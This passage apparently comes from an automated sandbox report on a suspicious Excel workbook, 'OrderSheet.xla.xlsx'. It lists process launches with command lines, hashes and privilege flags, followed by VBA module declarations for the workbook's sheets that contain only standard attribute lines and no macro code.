                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Imagebase:0x7ff6413e0000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:00:48:51
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:00:48:52
                            Start date:10/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6741f0000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:15
                            Start time:00:48:55
                            Start date:10/12/2024
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx"
                            Imagebase:0xf60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Call Graph

                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration

                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration

                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration

                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True
